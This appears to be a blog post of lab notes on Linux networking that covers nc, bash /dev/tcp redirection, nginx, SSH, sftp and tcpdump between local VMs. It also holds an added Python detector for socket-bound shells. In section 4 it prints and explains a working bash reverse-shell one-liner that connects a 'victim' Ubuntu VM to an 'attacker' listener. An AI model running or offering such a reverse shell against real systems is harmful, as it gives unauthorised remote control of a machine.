Environment:
kali:
┌──(kali㉿kali)-[~/Desktop]
└─$ cat /proc/version
Linux version 6.0.0-kali5-amd64 ([email protected]) (gcc-12 (Debian 12.2.0-9) 12.2.0, GNU ld (GNU Binutils for Debian)
1. Set up a simple nc connection so that two ports can talk to each other
# First, listen on a port with nc
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvp 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 47210
# Use nc to connect to the local port
┌──(kali㉿kali)-[~/Desktop]
└─$ nc 127.0.0.1 1234
hello
ls
2. Attempting to send data to /dev/tcp/127.0.0.1/1234 fails!
Reason: see the CSDN post "反弹shell失败 原来是这个原因_反弹shell时kali监听不到端口数据怎么办" (Reverse shell failing: why the Kali listener receives no data)
It does not work on Kali because Kali's bash is built with the network redirection option, --enable-net-redirections, disabled by default.
Fix: download the bash source again and recompile it with that option enabled:
wget https://ftp.gnu.org/gnu/bash/bash-5.1.tar.gz
tar -xzvf bash-5.1.tar.gz
cd bash-5.1
./configure --enable-net-redirections
make
sudo make install
3. Sending data to a local port on Ubuntu
The path /dev/tcp/127.0.0.1/1234 is virtual: bash interprets it and opens a TCP connection; no such file exists on disk.
tty1:
brinmon@brinmon-virtual-machine:~/桌面$ nc -lvp 1234
Listening on 0.0.0.0 1234
Connection received on localhost 59588
djajaslkdjalskdjlaksjdlka
tty2:
brinmon@brinmon-virtual-machine:~/桌面$ cat 1.txt > /dev/tcp/127.0.0.1/1234
4. Reverse shell
Attacker machine, Windows 10:
Environment: netcat 1.11 for Win32/Win64 (eternallybored.org)
# Listen on port 1234
┌──E:\ReverseTools\netcat-win32-1.12
└─>nc -lvp 1234
Victim: Ubuntu
# The victim runs this command
┌──brinmon@brinmon-virtual-machine:~/桌面
└─$ bash -i >& /dev/tcp/192.168.235.1/1234 0>&1
What this command does:
- Starts an interactive shell with bash and redirects that shell's output to the attacker's machine
- 0>&1: 1 is standard output, which already points at the attacker's machine, so this redirects standard input to the attacker's machine as well
Note: 192.168.235.1 is this machine's gateway; because everything is local there is no need to use the IP, although that works too.
Command breakdown:
- /dev/tcp/192.168.235.1/1234: the port the attacker is listening on
- bash -i: start an interactive shell
- >: redirect output
- &: (as in >&) send standard output and standard error to the same place
- 0: standard input (stdin)
- 1: standard output (stdout)
- 0>&1: redirect standard input to standard output, so that both input and output travel over the TCP connection established above
Shell obtained successfully:
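The redirection pattern just explained leaves a recognisable trace on the victim: an interactive shell whose file descriptors 0, 1 and 2 all point at a socket instead of a terminal. As an added defensive example (not part of the original post), the Python below looks for that pattern in a /proc-style snapshot; the sample snapshot, its pids and inode numbers are constructed, and the live_snapshot helper is an assumption about how such a snapshot would be gathered on a running host.

```python
import os
import re

# A shell started as "bash -i >& /dev/tcp/HOST/PORT 0>&1" ends up with fds 0, 1
# and 2 all pointing at the same socket instead of a tty. /proc/PID/fd/N links
# show this as "socket:[inode]". The shell names below are a heuristic list.
SHELLS = {"bash", "sh", "dash", "zsh"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")


def socket_std_fds(comm, fd_targets):
    """Return the subset of {0, 1, 2} that point at a socket; empty if not a shell."""
    if comm not in SHELLS:
        return set()
    return {fd for fd in (0, 1, 2) if SOCKET_RE.match(fd_targets.get(fd, ""))}


def find_socket_shells(snapshot):
    """snapshot maps pid -> (comm, {fd: link target}); returns the pids of
    shells whose stdin, stdout and stderr are all sockets."""
    return sorted(pid for pid, (comm, fds) in snapshot.items()
                  if socket_std_fds(comm, fds) == {0, 1, 2})


def live_snapshot(proc="/proc"):
    """Build the same snapshot shape from a running Linux host (assumed helper)."""
    snap = {}
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(f"{proc}/{entry}/comm") as fh:
                comm = fh.read().strip()
            fds = {fd: os.readlink(f"{proc}/{entry}/fd/{fd}") for fd in (0, 1, 2)}
        except OSError:  # process exited, fd not open, or not readable
            continue
        snap[int(entry)] = (comm, fds)
    return snap


# Constructed sample snapshot (not captured from a real system); inode numbers are made up.
SAMPLE = {
    1000: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),             # normal terminal shell
    1001: ("bash", {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}),  # matches the pattern
    1002: ("nginx", {0: "/dev/null", 1: "socket:[51]", 2: "socket:[51]"}),           # daemon, not a shell
    1003: ("bash", {0: "/dev/pts/1", 1: "/tmp/1.txt", 2: "/dev/pts/1"}),             # shell with a file redirect
}

if __name__ == "__main__":
    print("suspicious pids:", find_socket_shells(SAMPLE))  # -> [1001]
    # On a real host: find_socket_shells(live_snapshot())
```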
5. Using file descriptors
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    FILE *f = fopen("1.txt", "wb");   // fopen takes the lowest free descriptor: 0, 1 and 2 are in use, so this is fd 3
    if (f == NULL) { perror("fopen"); return 1; }
    system("echo hello123 >&3");      // >&3 is shorthand for 1>&3: the child shell inherits fd 3, so its stdout is written to 1.txt
    fclose(f);
    return 0;
}
6. Setting up a web server
- Install the nginx service
root@brinmon-virtual-machine:/home/brinmon/桌面# apt-get install nginx
- Check whether the nginx service is running
root@brinmon-virtual-machine:/var/www/html# sudo systemctl status nginx
● nginx.service - A high performance web server and a reverse proxy server
Loaded: loaded (/lib/systemd/system/nginx.service; enabled; preset: enabled)
Active: active (running) since Tue 2024-05-21 22:14:18 CST; 4min 47s ago
Docs: man:nginx(8)
Process: 3469 ExecStartPre=/usr/sbin/nginx -t -q -g daemon on; master_process on; (co>
Process: 3470 ExecStart=/usr/sbin/nginx -g daemon on; master_process on; (code=exited>
Main PID: 3558 (nginx)
Tasks: 5 (limit: 2219)
Memory: 6.2M
CPU: 35ms
CGroup: /system.slice/nginx.service
├─3558 "nginx: master process /usr/sbin/nginx -g daemon on; master_process o>
├─3560 "nginx: worker process"
├─3561 "nginx: worker process"
├─3562 "nginx: worker process"
└─3563 "nginx: worker process"
- Edit the page in the web root directory
root@brinmon-virtual-machine:/home/brinmon/桌面# cd /var/www/html
root@brinmon-virtual-machine:/var/www/html# ls
index.nginx-debian.html
index.nginx-debian.html is our web page! It can be edited by hand; to visit it, just enter this machine's IP in a browser.
Success: 欢迎来到nginx! (Welcome to nginx!)
7. Connecting to the VM over SSH
Tutorial: CSDN post "SSH远程连接linux虚拟机详细步骤(超详细)" (detailed steps for connecting to a Linux VM over SSH)
- Set the virtual machine's network mode to NAT
- Install the SSH service, openssh-server, on Linux
# Install the ssh service
root@brinmon-virtual-machine:/var/www/html# sudo apt install openssh-server
# Restart the service
root@brinmon-virtual-machine:/var/www/html# sudo service ssh restart
- Connect to Linux from Windows
# ssh username@ip-address connects to the server
E:\ReverseTools\netcat-win32-1.12>ssh [email protected]
ssh: connect to host 192.168.235.128 port 22: Connection refused
E:\ReverseTools\netcat-win32-1.12>ssh [email protected]
The authenticity of host '192.168.235.128 (192.168.235.128)' can't be established.
ECDSA key fingerprint is SHA256:BYd+bOcoliIL45ML4l90wD1g8ljJ2eRIihPgCQg4wZo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.235.128' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 23.04 (GNU/Linux 6.2.0-39-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
15 更新可以立即应用。
这些更新中有 1 个是标准安全更新。
要查看这些附加更新,请运行:apt list --upgradable
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
brinmon@brinmon-virtual-machine:~$ ls
公共的 模板 视频 图片 文档 下载 音乐 桌面 pwndocker snap tools
8. File transfer with sftp
E:\ReverseTools\netcat-win32-1.12>sftp [email protected]
[email protected]'s password:
Connected to 192.168.235.128.
sftp> ls
flag.txt pwndocker snap tools
sftp> get flag.txt
Fetching /home/brinmon/flag.txt to flag.txt
/home/brinmon/flag.txt 100% 23 7.6KB/s 00:00
sftp> put nc.exe
Uploading nc.exe to /home/brinmon/nc.exe
nc.exe 100% 38KB 3.4MB/s 00:00
File downloaded successfully:
9. Packet capture on Linux
# Start capturing
root@brinmon-virtual-machine:/home/brinmon/桌面# tcpdump -i ens33 -w 1.cap
The capture file can be copied to Windows and analysed with NetAnalyzer!
Source: https://blog.csdn.net/qq_65474192/article/details/139112813